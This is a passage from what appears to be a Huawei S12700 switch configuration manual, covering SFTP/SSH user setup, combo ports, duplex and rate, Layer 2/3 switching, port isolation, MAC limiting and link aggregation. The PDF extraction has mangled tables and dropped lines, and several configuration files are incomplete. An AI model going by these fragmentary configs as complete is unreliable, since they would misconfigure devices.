Step 4 Connect SFTP clients to the SSH server.

# Enable the first authentication function on the SSH clients upon the first login.
[HUAWEI] sysname client001
[client001] ssh client first-time enable //Enable the first authentication
function on client001.
[client002] ssh client first-time enable //Enable the first authentication
function on client002.
# Log in to the SSH server from client001 in password authentication mode.

[client001] sftp 10.1.1.1
Please input the
username:client001
Trying
10.1.1.1 ...
Press CTRL+K to
abort
Connected to
10.1.1.1 ...
password:SSH_SERVER_CODE
Please select public key type for user authentication [R for RSA; D for DSA;
Enter for Skip publickey authentication; Ctrl_C for Cancel], Please select [R, D,
Enter or
Ctrl_C]:D
Enter

password:
sftp-client>
# Log in to the SSH server from client002 in DSA authentication mode.

[client002] sftp 10.1.1.1
Please input the
username:client002
Trying
10.1.1.1 ...
Press CTRL+K to
abort
Connected to
10.1.1.1 ...
password:SSH_SERVER_CODE
Please select public key type for user authentication [R for RSA; D for DSA;
Enter for Skip publickey authentication; Ctrl_C for Cancel], Please select [R, D,
Enter or
Ctrl_C]:D
sftp-client>

Run the display ssh server status command on the SSH server to check whether the SFTP
service is enabled. Run the display ssh user-information command to check information
about SSH users on the server.
# Check the status of the SSH server.
[SSH Server] display ssh server status
SSH version :1.99
SSH connection timeout :60 seconds
SSH server key generating interval :0 hours
SSH authentication retries :3 times
SFTP server :Enable
Stelnet server :Disable
Scp server :Disable
SSH server source :0.0.0.0
ACL4 number :0
ACL6 number :0
# Check information about SSH users.

[SSH Server] display ssh user-information
User 1:
User Name : client001
Authentication-type : password
User-public-key-name : -
User-public-key-type : -
Sftp-directory : flash:
Service-type : sftp
Authorization-cmd : No
User 2:
User Name : client002
Authentication-type : dsa
User-public-key-name : dsakey001

User-public-key-type : dsa
Sftp-directory : flash:
Service-type : sftp
Authorization-cmd : No
----End
Configuration Files
l Configuration file of the SSH server
#
sysname SSH Server
#
dsa peer-public-key dsakey001 encoding-type der
public-key-code begin
30820322
02820100
DEDEBA5C 8244DCB8 E696917C EFEBC0B3

E6FB60BE
8B9E36D3 E4EB9CD6 EB7FD210 219AC0F4

1AD47BF1
EACD435D 39AFA8FA CB6A7819 305EE147

E428912E
60452B37 CA17D611 C2EE4C46 B4BC7726

54C26856
A99ECFA5 D800367B 31A90522 F139496F

4182DBFD
AAB59973 9AB02185 856A881F 9197368B

92DBF684
9D1C746B A27E12F9 8A28E4B6 D0587D65

5979A750
5413E91E FC961C3F 79209625 CFA8D7D4

69FA35A3
9E37B614 047D535D CD63AF30 58B3A25B

79C714B6
326B7DB6 067EBF15 3CC1A720 B0E1A7E3

9C13FEB3
BA26E6B0 52DC5BFF EE7C5C52 148FE6C2

40738FBB
8F05D416 B2B5DD72 E3629BB5 9244BF9F

A29C4FCD
4EA0EE50 1FC6695D 03D68D51

9324E493
0214
C6C484E1 F0076B8A FCAD302B 98B50A3A

542ABEBB
02820100

3AC11746 EE959CBD 30F669C5 7E290BC4

7CB5BBFD
96AE9215 7A29C723 72FE8A02 EBED3B76

BE810B42
21AD8D32 F7723F83 59F46B66 FF7805CC

3F86D5D6
5BD424BD 70677EFF 1ACF9B3C CE02CD40

46560DA4
2036205C 6EFAB148 66E6A106 0DF6258B

EE31CFE7
4B6C59B4 6FE59A9F BE64F982 EC36A669

FF597FB7
9A56E32E C15A0659 3D17C407 29F587C7

74959017
62B08070 24564B2E E79C6E1D 86793548

76CC662A
1D3DE1D1 2C79E102 C0B10E5C 9C4428B3

AEB93278
26D4CDE5 189A93EA 531E0FF8 2199EF35

DF038976
4538434F F39924F0 5BF17AC8 8E340991

B5EA0A62
A915EE63 F660C092 360C5D2D 796AF230

DB7461F7
C15B6DBA 65C9EFAB 247DB13D

4942E2FF
02820100
D7C6399A 86F7B38C 85168EF8 692BD9B4

01AA7BCD
98559075 98039259 0C54818C 650A95C7

0A5250EB
12124E5B C4123350 C190CC8B 4FFFD418

7E8F113F
6C36AB4B A56D2D1D 2C874C75 8400DAFE

4BABF957
4EDC8E7C DF5934DB 3AD717E5 50B1096B

C0B46DE5
3FB508FA CB76FF1C 42CF7082 7DDEEB47

5C5C4F64
B1C8815C 496AC1E0 04C10EDD FE849B76

6DA15B48
0C9CF0B1 10BDDC08 41A65C28 8E21ADC6

48A93DF6
14552C1F 76A401AE E06E482D 6582052E

5B11A678

A467B38A B77C1C55 D367E253 FFA44841

FC38A462
B9AC24E6 DAD01628 F09ED629 58F666C1

1DEF7BD0
634C3D13 D75F2614 8CB49AFC 498A5195

F443CA4D
C02FF228 A90D7593 AE46C5D0 4B224FEE

public-key-code end
peer-public-key end
#
aaa
local-user client001 password irreversible-cipher %^%#-=9Z)M,-aL$_U%#$W^1T-
\}Fqpe$E<#H$J<6@KTSL/J'\}I-%^%#
local-user client001 service-type ssh
#
sftp server enable
ssh user client001
ssh user client001 authentication-type password
ssh user client002
ssh user client002 authentication-type dsa
ssh user client002 assign dsa-key dsakey001
#
#
return
l Configuration file of client001

#
sysname client001
#
ssh client first-time enable
#
return
l Configuration file of client002

#
sysname client002
#
ssh client first-time enable
#
return

Typical Configuration Examples 5 Typical Ethernet Interface Configuration
5 Typical Ethernet Interface Configuration
About This Chapter
5.1 Example for Configuring a Combo Interface

5.2 Example for Configuring the Rate and Duplex Mode of an Ethernet Interface
5.3 Example for Switching an Interface Between Layer 2 and Layer 3 Modes
5.4 Example for Configuring Port Isolation

5.1 Example for Configuring a Combo Interface

Introduction to a Combo Interface
A combo interface consists of a GE electrical interface and a GE optical interface on the
panel. The multiplexed electrical and optical interfaces cannot work at the same time. When
one interface works, the other interface is disabled. You can use the electrical or optical
interface according to networking requirements.
The electrical and optical interfaces share one interface view. When you enable the electrical
or optical interface, configure the interface attributes (such as the rate and duplex mode) in the
same interface view.
Configuration Notes
l Usage restrictions:
– The electrical and optical interfaces of a combo interface are multiplexed. The
optical interface cannot have a copper module installed.
– When a combo interface works in auto mode and the combo optical interface has an
optical module installed, the combo interface works as an optical interface after the
device restarts.
– You can configure the working mode of the combo interface based on the remote
interface type. If the local combo electrical interface is connected to a remote
electrical interface, configure the combo interface to work in copper mode. If the
local combo optical interface is connected to a remote optical interface, configure
the combo interface to work in fiber mode. If the local combo interface is
configured to work in a different mode from the remote interface, the two interfaces
cannot communicate.
l This example applies to switches that support the combo interface.
As shown in Figure 5-1, PC1, PC2, and PC3 connect to GE1/0/1, GE1/0/2 and GE1/0/3 of
the Switch respectively. The Switch connects to the Internet through the combo interface
GE1/0/4. You can configure the working mode of the combo interface based on the remote
interface type. In this example, the remote interface at the Internet side is an electrical
interface.

Figure 5-1 Networking diagram for configuring the working mode of a combo interface
Internet
Switch GE1/0/4
GE1/0/1 GE1/0/3
GE1/0/2
PC1 PC2 PC3
l Configure the combo interface to work as an electrical interface. This configuration

ensures that the combo interface's working mode does not change when the transmission
medium changes, for example, a GE optical module is installed.
Procedure
Step 1 Configure the combo interface GE1/0/4 to work as an electrical interface.
[Switch-GigabitEthernet1/0/4] combo-port copper //Configure the combo interface
to work as an electrical interface. By default, the combo interface's working
mode is auto.

Run the display interface gigabitethernet 1/0/4 command in any view to check the working
mode of the combo interface.
[Switch] display interface gigabitethernet 1/0/4
...
Port Mode: FORCE COPPER
Speed : 1000, Loopback: NONE
Duplex: FULL, Negotiation: ENABLE
Mdi : AUTO, Flow-control: DISABLE
...
If COMBO AUTO is displayed, the combo interface automatically selects the working mode.
If FORCE FIBER is displayed, the combo interface is configured to work as an optical
interface. If FORCE COPPER is displayed, the combo interface is configured to work as an

electrical interface. The preceding command output shows that the combo interface is
configured to work as an electrical interface.
----End
Configuration File
#
sysname Switch
#
combo-port copper
#
return
5.2 Example for Configuring the Rate and Duplex Mode of

an Ethernet Interface
Introduction to the Rate and Duplex Mode of Ethernet Interfaces
Interfaces can work in the following two duplex modes:
l Half-duplex mode: An interface in this mode only receives or sends data at a time within
a specified transmission distance.
l Full-duplex mode: An interface in this mode receives and sends data at the same time.
The maximum throughput in full-duplex mode is double that in half-duplex mode, and
the transmission distance is not limited.
You can configure the rate and duplex mode of an Ethernet interface working in either auto-
negotiation or non-auto-negotiation mode.
l In auto-negotiation mode, interfaces at both ends of a link negotiate the rate and duplex
mode. If the negotiation succeeds, the two interfaces use the same duplex mode and rate.
The auto-negotiation function takes effect only when both the connected devices support
it. If the remote device does not support auto-negotiation or uses a different auto-
negotiation mode, the connected interfaces may be Down.
l You can configure the local interface to work in non-auto-negotiation mode and
manually configure the interface rate and duplex mode in the following situations:
The remote device does not support auto-negotiation.
After auto-negotiation is configured, the local and remote devices cannot communicate.
After auto-negotiation is configured, the physical link between the local and remote
devices is connected, but a lot of error packets are generated or packet loss occurs.
Configuration Notes
l Usage restrictions
– Ethernet interfaces at both ends of a link must work in the same auto-negotiation
mode. Otherwise, the interfaces may be Down.
– When the working rate of a GE electrical interface is 1000 Mbit/s, the interface
supports only the full-duplex mode and does not need to negotiate the duplex mode
with the remote interface.

– Interfaces at both ends of a link must use the same rate and duplex mode.
– Table 5-1 lists the rate and duplex mode of Ethernet interfaces.
Table 5-1 Rate and duplex mode of Ethernet interfaces

Interface Transmiss Ra Duplex Auto Remarks
Type ion te mode -
Medium (M Neg
bit otiat
/s) ion
Mod
e
GE Network 10 Full-duplex/ Supp Physical service

electrical cable half-duplex orted interfaces of the X1E
interface series cards on a
10 Full-duplex/ modular switch do not
0 half-duplex support the duplex
10 Full-duplex mode configuration.
00
GE optical FE optical 10 Full-duplex Not By default, auto-

interface module 0 supp negotiation is enabled
orted on GE optical
interfaces and rate
GE optical 10 Full-duplex Supp auto-negotiation is
module 00 orted disabled. You can run
the speed auto-
negotiation command
to enable rate auto-
negotiation.
GE copper 10 Full-duplex/ Supp -

module 00 half-duplex orted
XGE XGE 10 Full-duplex Not l The XGE

(10GE) optical 00 supp interfaces on the
optical module 0 orted ACU2,
interface ET1D2IPS0S00,
XGE/GE 10 Full-duplex Not ET1D2FW00S00,
optical 00 supp ET1D2FW00S01,
module 0/1 orted and
00 ET1D2FW00S02
0 cards do not
GE optical 10 Full-duplex Supp support the
module 00 orted configuration of
auto-negotiation
mode and interface
rate.
l Assume that an
XGE optical
interface has an


Type ion te mode -
Medium (M Neg
bit otiat
/s) ion
Mod
e
GE copper 10 Full-duplex Supp XGE/GE optical

module 00 orted module installed
and the interface
rate is set to 1000
Mbit/s by running
the speed auto
1000 command.
When you run the
display interface
command on the
interface, the
command output
shows that auto-
negotiation is
enabled. However,
you cannot run the
negotiation auto
command to
configure the auto-
negotiation mode.
l Only switches in
V200R007 and
later versions
support XGE/GE
optical modules.
40GE 40GE 40 Full-duplex Not -

optical optical 00 supp
interface module 0 orted
High-speed 40 Full-duplex Supp When you run the

cable 00 orted display interface
0 command on a 40GE
optical interface that
has a high-speed cable
installed, the
command output
shows that auto-
negotiation is enabled.
However, you cannot
run the negotiation
auto command to
configure the auto-
negotiation mode.


Type ion te mode -
Medium (M Neg
bit otiat
/s) ion
Mod
e
100GE 100GE 10 Full-duplex Not Only EE series cards

optical optical 00 supp support 100GE optical
interface module 00 orted interfaces.
As shown in Figure 5-2, Server1, Server2, and Server3 form a server cluster and connect to
GE1/0/1, GE1/0/2, and GE1/0/3 of the Switch respectively. The Switch connects to the
Internet through GE1/0/4.
Due to limitations of network adapters on the servers, GE1/0/1, GE1/0/2, and GE1/0/3 can
only work in half-duplex mode after negotiating with connected server interfaces. As a result,
packet loss occurs when the service traffic volume is high. In addition, the rate is negotiated
to 1000 Mbit/s for GE1/0/1, GE1/0/2, and GE1/0/3. When the three servers concurrently send
data at the rate of 1000 Mbit/s, the outbound interface GE1/0/4 may be congested. Users
require that packet loss and congestion do not occur.
Figure 5-2 Networking diagram for configuring the rate and duplex mode in non-auto-
negotiation mode
Internet
Switch GE1/0/4
GE1/0/1 GE1/0/3
GE1/0/2
Server1 Server2 Server3

l Configure the switch interfaces to work in non-auto-negotiation mode to prevent the

interface rate from being affected by the network adapter rate on the servers.
l Set the duplex mode to full-duplex for the interfaces working in non-auto-negotiation
mode to avoid packet loss.
l Set the rate to 100 Mbit/s for the interfaces working in non-auto-negotiation mode to
avoid congestion on the outbound interface.
Procedure
Step 1 Create a port group and add GE1/0/1, GE1/0/2, and GE1/0/3 to the port group.
[Switch] port-group portgroup1 //Create a permanent port group portgroup1.
[Switch-port-group-portgroup1] group-member GE1/0/1 to GE1/0/3 //Add
GE1/0/1,GE1/0/2, and GE1/0/3 to portgroup1.
Step 2 Configure GE1/0/1, GE1/0/2, and GE1/0/3to work in non-auto-negotiation mode, and set the
duplex mode to full-duplex and rate to 100 Mbit/s for these interfaces in a batch.
[Switch-port-group-portgroup1] undo negotiation auto //Configure interfaces to
work in non-auto-negotiation mode in a batch.
[Switch-GigabitEthernet1/0/1] undo negotiation auto
[Switch-port-group-portgroup1] duplex full //Set the duplex mode of the
interfaces to full-duplex in a batch.
[Switch-GigabitEthernet1/0/1] duplex full
[Switch-port-group-portgroup1] speed 100 //Set the rate of the interfaces to
100 Mbit/s in a batch.
[Switch-GigabitEthernet1/0/1] speed 100
[Switch-port-group-portgroup1] quit

Run the display interface gigabitethernet 1/0/1 command in any view to check the interface
rate and duplex mode.
[Switch] display interface gigabitethernet 1/0/1
...
Port Mode: COMMON COPPER
Speed : 100, Loopback: NONE
Duplex: FULL, Negotiation: DISABLE
Mdi : AUTO, Flow-control: DISABLE
...
The command output shows that the interface works in non-negotiation mode, the rate is 100
Mbit/s, and the duplex mode is full-duplex.
Similarly, run the display interface gigabitethernet 1/0/2 and display interface
gigabitethernet 1/0/3 commands on GE1/0/2 and GE1/0/3 respectively to check interface
working information.
----End
Configuration File
#
sysname Switch

#
undo negotiation auto
speed 100
#
speed 100
#
speed 100
#
port-group portgroup1
group-member GigabitEthernet1/0/1
#
return
5.3 Example for Switching an Interface Between Layer 2

and Layer 3 Modes
Introduction to Switching an Interface Between Layer 2 and Layer 3 Modes
Due to hardware restrictions of interface cards, some Ethernet interfaces work in only Layer 2
or Layer 3 mode, whereas other Ethernet interfaces can work in both Layer 2 and Layer 3
modes.
Configuration Notes
l By default, an Ethernet interface works in Layer 2 mode and belongs to VLAN 1. An
interface is not removed from VLAN 1 immediately after being switched to Layer 3
mode. It is removed from VLAN 1 only when Layer 3 protocols are Up.
l You can configure Layer 2 and Layer 3 modes of an Ethernet interface in the Ethernet
interface view or system view. When the configurations in the two views differ, the latest
configuration takes effect.
l The minimum interval between running the portswitch and undo portswitch commands
is 30 seconds. That is, after changing the mode of an Ethernet interface, you have to wait
at least 30 seconds before changing the mode again.
l If service configurations (such as the port link-type trunk configuration) exist on an
interface, you need to clear all service configurations before switching the interface
between Layer 2 and Layer 3 modes. The mode switching configuration takes effect on
an interface when only attribute configurations (such as shutdown and description
configurations) exist on the interface.
l Interfaces on the S12700 can be switched between Layer 2 and Layer 3 modes. IP
addresses can be assigned to Ethernet interfaces working in Layer 3 mode.
As shown in Figure 5-3, PC1, PC2, PC3, and PC4 are on four network segments, and
SwitchB, SwitchC, SwitchD, and SwitchE are access switches for these four network
segments, respectively. It is required that four physical Ethernet interfaces on SwitchA be
configured as gateway interfaces for these four network segments.

Figure 5-3 Networking diagram for configuring the rate and duplex mode in non-auto-
negotiation mode
10.10.1.0/24
PC1
SwitchB
GE1/0/1
SwitchA
GE1/0/2 GE1/0/4
GE1/0/3
SwitchC SwitchD SwitchE
PC2 PC3 PC4

10.10.2.0/24 10.10.3.0/24 10.10.4.0/24
l Switch interfaces to Layer 3 mode.

l Configure IP addresses of Layer 3 Ethernet interfaces as gateway addresses.
Procedure
Step 1 Switch interfaces to Layer 3 mode.
# Switch an interface to Layer 3 mode.

[HUAWEI] sysname SwitchA
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] undo portswitch
[SwitchA-GigabitEthernet1/0/1] quit
# Switch Ethernet interfaces to Layer 3 mode in a batch.

[SwitchA] undo portswitch batch gigabitethernet 1/0/2 to 1/0/4

Step 2 Configure IP addresses of Layer 3 Ethernet interfaces as gateway addresses.

# Configure the IP address of GE1/0/1 as a gateway address. The configurations of GE1/0/2,
GE1/0/3, and GE1/0/4 are similar to the configuration of GE1/0/1, and are not mentioned
here. For details, see the configuration files.
[SwitchA-GigabitEthernet1/0/1] ip address 10.10.1.1 24
Step 3 Run the display interface gigabitethernet 1/0/1 command in any view to check the interface
working mode.
[SwitchA] display interface gigabitethernet 1/0/1
...
Description:
Route Port,The Maximum Frame Length is 9216
Internet Address is 10.10.1.1/24
...
If Switch Port is displayed, the interface works in Layer 2 mode. If Route Port is displayed,
the interface works in Layer 3 mode. The preceding command output shows that the interface
works in Layer 3 mode.
Similarly, run the display interface gigabitethernet 1/0/2, display interface gigabitethernet
1/0/3, and display interface gigabitethernet 1/0/4 commands on GE1/0/2, GE1/0/3, and
GE1/0/4 respectively to check the interface working mode.
----End
Configuration File
Configuration file of the SwitchA
#
sysname SwitchA
#
undo portswitch
ip address 10.10.1.1 255.255.255.0
#
undo portswitch
ip address 10.10.2.1 255.255.255.0
#
undo portswitch
ip address 10.10.3.1 255.255.255.0
#
undo portswitch
ip address 10.10.4.1 255.255.255.0
#
return
5.4 Example for Configuring Port Isolation

Introduction to Port Isolation
To implement Layer 2 isolation between interfaces, you can add each interface to a different
VLAN. This method, however, wastes VLAN resources. Port isolation can isolate interfaces
in the same VLAN, and a port isolation group can effectively implement Layer 2 isolation
between these interfaces. Port isolation provides secure and flexible networking solutions.

The port isolation mode can be Layer 2 isolation and Layer 3 interworking or Layer 2 and
Layer 3 isolation.
l To isolate broadcast packets in the same VLAN but allow users connecting to different
interfaces to communicate at Layer 3, you can set the port isolation mode to Layer 2
isolation and Layer 3 interworking.
l To prevent interfaces in the same VLAN from communicating at both Layer 2 and Layer
3, you can set the port isolation mode to Layer 2 and Layer 3 isolation.
Configuration Notes
l The S12700 supports Layer 2 isolation and Layer 3 interworking.
l The S12700 supports Layer 2 Layer 2 and Layer 3 isolation.
l Do not add both the uplink and downlink interfaces to the same port isolation group
unless it is required. Otherwise, the uplink and downlink interfaces cannot communicate.
An R&D office of a company contains employees from the company, partner company A, and
partner company B. As shown in Figure 5-4, PC1 and PC2 are used by two employees from
partner companies A and B respectively, and PC3 is used by an R&D employee from the
company. The requirements are as follows:
VLAN resources need to be saved.
Employees from partner companies A and B cannot communicate with each other.
Employees from partner companies A and B can communicate with the company's
employees.
Figure 5-4 Networking diagram for configuring port isolation
R o u te r
S w itch
G E 1 /0 /1 G E 1 /0 /3
P o rt iso la tio n
g ro u p
GE1/0/2
PC1 PC2 PC3

1 0 .1 0 .1 0 .1 /2 4 1 0 .1 0 .1 0 .2 /2 4 1 0 .1 0 .1 0 .3 /2 4
E m p lo ye e o f E m p lo ye e o f
E m p lo ye e o f
p a rtn e r p a rtn e r
th e co m p a n y
co m p a n y A co m p a n y B
VLAN 10

1. Add interfaces to a VLAN.
2. Add the interfaces to a port isolation group to implement Layer 2 isolation between these
interfaces. The default port isolation mode is Layer 2 isolation and Layer 3 interworking.
Procedure
Step 1 Configure port isolation.
# Configure port isolation on GE1/0/1.
[Switch] vlan 10
[Switch-vlan10] quit
[Switch-GigabitEthernet1/0/1] port link-type access //Set the interface type of
GE1/0/1 to access.
[Switch-GigabitEthernet1/0/1] port-isolate enable //By default, the interface
is added to port isolation group 1 and the port isolation mode is Layer 2
isolation and Layer 3 interworking. You can run the port-isolate mode all command
to set the port isolation mode to Layer 2 and Layer 3 isolation.
# Configure port isolation on GE1/0/2.

GE1/0/2 to access.
[Switch-GigabitEthernet1/0/2] port-isolate enable //By default, the interface
is added to port isolation group 1 and the port isolation mode is Layer 2
isolation and Layer 3 interworking. You can run the port-isolate mode all command
to set the port isolation mode to Layer 2 and Layer 3 isolation.
# Add GE1/0/3 to VLAN 10.

GE1/0/3 to access.

# PC1 and PC2 cannot communicate with each other.
# PC1 and PC3 can communicate with each other.
# PC2 and PC3 can communicate with each other.
----End
Configuration File
#
sysname Switch

#
vlan batch 10
#
port-isolate enable group 1
#
#
#
return
Related Content
Videos
Configure Port Isolation.

Typical Configuration Examples 6 Typical Ethernet Switching Configuration
6 Typical Ethernet Switching Configuration
About This Chapter
6.1 Typical MAC Configuration

6.2 Link Aggregation Configuration
6.3 Typical VLAN Configuration
6.4 Typical QinQ Configuration
6.5 Typical Loopback Detection Configuration

6.1 Typical MAC Configuration
6.1.1 Example for Configuring MAC Address Limiting in a VLAN

Overview of MAC Address Limiting in a VLAN
The switch limits the number of MAC address entries based on VLANs or interfaces. In
offices where clients seldom change, you can configure MAC address limiting to control user
access. If hackers forge a large number of packets with different source MAC addresses and
send the packets to the device, finite MAC address entries in the MAC address table of the
device may be exhausted. When the MAC address table is full, the device cannot learn source
MAC addresses of valid packets. As a result, the device broadcasts the valid packets, wasting
bandwidth resources.
Compared with MAC address limiting on an interface, MAC address limiting in a VLAN can
limit the number of MAC address entries on multiple interfaces in a VLAN.
Configuration Notes
l After the port-security enable command is configured on an interface, MAC address
limiting cannot take effect on the interface. Do not configure port security and MAC
address limiting on the same interface simultaneously.
l This example applies to all versions of the S12700.
As shown in Figure 6-1, user network 1 is connected to GE1/0/1 of the switch through
LSW1, user network 2 is connected to GE1/0/2 of the switch through LSW2, and GE1/0/1
and GE1/0/2 belong to VLAN 2. To control the number of access users, configure MAC
address limiting in VLAN 2.
Figure 6-1 Networking of MAC address limiting in a VLAN
Network
Switch
GE1/0/1 GE1/0/2
LSW1 LSW2
User User
network 1 VLAN 2 network 2

1. Create a VLAN and add interfaces to the VLAN to implement Layer 2 forwarding.
2. Configure MAC address limiting in a VLAN to prevent MAC address attacks and
control the number of access users.
Procedure
Step 1 Create VLAN 2 and add GE1/0/1 and GE1/0/2 to VLAN 2.
[Switch] vlan batch 2
[Switch-GigabitEthernet1/0/1] port link-type trunk //Configure the link type of
the interface as trunk.
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 2 //Add GE1/0/1 to
VLAN 2.
[Switch] interface gigabitethernet 1/0/2 //The configuration of GE1/0/2 is
similar to the configuration of GE1/0/1.
[Switch-GigabitEthernet1/0/2] port link-type trunk
[Switch-GigabitEthernet1/0/2] port trunk allow-pass vlan 2
Step 2 Configure the following MAC address limiting rule in VLAN 2: A maximum of 100 MAC
addresses can be learned. When the number of learned MAC address entries reaches the limit,
the device forwards the packets with new source MAC address entries and generates an alarm.
[Switch] vlan 2
[Switch-vlan2] mac-limit maximum 100 action forward //The default action taken
for packets in different versions is different. You are advised to manually
configure the action. The alarm function is enabled by default, so you do not
need to configure the alarm function manually.
[Switch-vlan2] quit

# Run the display mac-limit command in any view to check whether the MAC address
limiting rule is successfully configured.
[Switch] display mac-limit
MAC limit is enabled
Total MAC limit rule count : 1
PORT VLAN/VSI SLOT Maximum Rate(ms) Action Alarm

----------------------------------------------------------------------------
- 2 - 100 - forward enable
----End
Configuration Files
Configuration file of the switch
#
sysname Switch
#
vlan batch 2
#
vlan 2
mac-limit maximum 100 action forward
#

#
#
return
6.1.2 Example for Configuring MAC Address Limiting on an

Interface
Overview of MAC Address Limiting on an Interface
The switch limits the number of MAC address entries based on VLANs or interfaces. In
offices where clients seldom change, you can configure MAC address limiting to control user
access. If hackers forge a large number of packets with different source MAC addresses and
send the packets to the device, finite MAC address entries in the MAC address table of the
device may be exhausted. When the MAC address table is full, the device cannot learn source
MAC addresses of valid packets. As a result, the device broadcasts the valid packets, wasting
bandwidth resources.
Compared with MAC address limiting in a VLAN, MAC address limiting on an interface is
applicable in scenarios where users connected to an interface in medium-scale and small-scale
enterprises are fixed and seldom change.
Configuration Notes
l After port-security enable is configured on an interface, MAC address limiting cannot
be configured on the interface.
As shown in Figure 6-2, user network 1 and user network 2 connect to the switch through the
LSW, and GE1/0/1 of the switch connects to the LSW. User network 1 and user network 2
belong to VLAN 10 and VLAN 20 respectively. On the switch, MAC address limiting can be
configured on GE1/0/1 to control the number of access users.

Figure 6-2 Networking of MAC address limiting on an interface
Network
Switch
GE1/0/1
LSW
User User
network 1 network 2
VLAN 10 VLAN 20
1. Create VLANs and add interfaces to the VLANs to implement Layer 2 forwarding.
2. Configure MAC address limiting on an interface to control the number of access users.
Procedure
Step 1 Create VLAN 10 and VLAN 20 and add GE1/0/1 to VLAN 10 and VLAN 20.
[Switch] vlan batch 10 20 //Create VLAN 10 and VLAN 20.
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 20 //Add GE1/0/1 to
VLAN 10 and VLAN 20.
Step 2 Configure a MAC address limiting rule on GE1/0/1: A maximum of 100 MAC address entries
can be learned. When the number of learned MAC address entries reaches the limit, the
device discards the packets with new source MAC address entries and generates an alarm.
[Switch-GigabitEthernet1/0/1] mac-limit maximum 100 action discard //The
default action taken for packets in different versions is different. You are
advised to manually specify the action. The alarm function is enabled by default,
so you do not need to specify it manually.

# Run the display mac-limit command in any view to check whether the MAC address
limiting rule is successfully configured.

[Switch] display mac-limit

MAC limit is enabled
Total MAC limit rule count : 1
PORT VLAN/VSI SLOT Maximum Rate(ms) Action Alarm

----------------------------------------------------------------------------
GE1/0/1 - - 100 - discard enable
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
mac-limit maximum 100
#
return
6.2 Link Aggregation Configuration
6.2.1 Example for Configuring Link Aggregation in Manual Mode

When Switches Are Directly Connected
Link Aggregation in Manual Mode

Ethernet link aggregation bundles multiple physical links to form a logical link to increase
link bandwidth. Link aggregation can work in manual mode or Link Aggregation Control
Protocol (LACP) mode.
In manual mode, you must manually create an Eth-Trunk and add member interfaces to the
Eth-Trunk. In this mode, LACP is not required. If a high link bandwidth between two directly
connected devices is required but the remote device does not support the LACP protocol, you
can use the manual mode. The manual mode can increase bandwidth, enhance reliability, and
implement load balancing.
In manual mode, all active links forward data and load balance traffic.
Configuration Notes
l Member interfaces of an Eth-Trunk must use the same Ethernet type and rate.
l Both devices of the Eth-Trunk must use the same number of physical interfaces,
interface rate, duplex mode, and flow control mode.
l If an interface of the local device is added to an Eth-Trunk, an interface of the remote
device directly connected to the interface of the local device must also be added to an
Eth-Trunk so that the two ends can communicate.
l Both devices of an Eth-Trunk must use the same link aggregation mode.

l This example applies to all versions and products.
As shown in Figure 6-3, SwitchA and SwitchB connect to devices in VLAN 10 and VLAN
20 through Ethernet links, and heavy traffic is transmitted between SwitchA and SwitchB.
SwitchA and SwitchB can provide higher link bandwidth to implement inter-VLAN
communication. Data transmission and link reliability need to be ensured.
Figure 6-3 Networking for configuring link aggregation in manual mode
VLAN 10 VLAN 10
G E 1 /0 /4 G E 1 /0 /1 G E 1 /0 /4
G E 1 /0 /1
S w itc h A G E 1 /0 /2 E th -T ru n k G E 1 /0 /2 S w itc h B
G E 1 /0 /3 G E 1 /0 /3
G E 1 /0 /5 E th -T ru n k 1 E th -T ru n k 1 G E 1 /0 /5
VLAN 20 VLAN 20
1. Create an Eth-Trunk and add member interfaces to the Eth-Trunk to increase link
bandwidth.
2. Create VLANs and add interfaces to the VLANs.
3. Set the load balancing mode to ensure that traffic is load balanced between member
interfaces of the Eth-Trunk and enhance reliability.
Procedure
Step 1 Create an Eth-Trunk on SwitchA and SwitchB and add member interfaces to the Eth-Trunk.
[SwitchA] interface eth-trunk 1 //Create Eth-Trunk 1.
[SwitchA-Eth-Trunk1] trunkport gigabitethernet 1/0/1 to 1/0/3 //Add GE1/0/1,
GE1/0/2, and GE1/0/3 to Eth-Trunk 1.
[SwitchA-Eth-Trunk1] quit
[HUAWEI] sysname SwitchB
[SwitchB] interface eth-trunk 1 //Create Eth-Trunk 1.
[SwitchB-Eth-Trunk1] trunkport gigabitethernet 1/0/1 to 1/0/3 //Add GE1/0/1,
GE1/0/2, and GE1/0/3 to Eth-Trunk 1.
[SwitchB-Eth-Trunk1] quit
Step 2 Create VLANs and add interfaces to the VLANs.
# Create VLAN 10 and VLAN 20 and add interfaces to VLAN 10 and VLAN 20. The
configuration of SwitchB is similar to the configuration of SwitchA, and is not mentioned
here.

[SwitchA] vlan batch 10 20

[SwitchA-GigabitEthernet1/0/4] port link-type trunk //Configure the interface
as a trunk interface. The default link type of an interface is not trunk.
[SwitchA-GigabitEthernet1/0/4] port trunk allow-pass vlan 10
as a trunk interface. The default link type of an interface is not trunk.
# Configure Eth-Trunk 1 to allow packets from VLAN 10 and VLAN 20 to pass through. The
here.
[SwitchA] interface eth-trunk 1
[SwitchA-Eth-Trunk1] port link-type trunk //Configure the interface as a trunk
interface. The default link type of an interface is not trunk.
[SwitchA-Eth-Trunk1] port trunk allow-pass vlan 10 20
Step 3 Set the load balancing mode of Eth-Trunk 1. The configuration of SwitchB is similar to the
configuration of SwitchA, and is not mentioned here.
[SwitchA-Eth-Trunk1] load-balance src-dst-mac //Configure load balancing based
on the source and destination MAC addresses on Eth-Trunk 1.

Run the display eth-trunk 1 command in any view to check whether the Eth-Trunk is created
and whether member interfaces are added.
[SwitchA] display eth-trunk 1
Eth-Trunk1's state information is:
WorkingMode: NORMAL Hash arithmetic: According to SA-XOR-DA
Least Active-linknumber: 1 Max Bandwidth-affected-linknumber: 8
Operate status: up Number Of Up Port In Trunk: 3
--------------------------------------------------------------------------------
GigabitEthernet1/0/1 Up 1
The preceding information shows that Eth-Trunk 1 contains three member interfaces:
GigabitEthernet1/0/1, GigabitEthernet1/0/2, and GigabitEthernet1/0/3. The member interface
status is Up and the value of Operate status of Eth-Trunk 1 is up.
----End
Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 10 20
#
load-balance src-dst-mac
#
eth-trunk 1

#
eth-trunk 1
#
eth-trunk 1
#
#
#
return
l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 10 20
#
load-balance src-dst-mac
#
eth-trunk 1
#
eth-trunk 1
#
eth-trunk 1
#
#
#
return
6.2.2 Example for Configuring Link Aggregation in LACP Mode

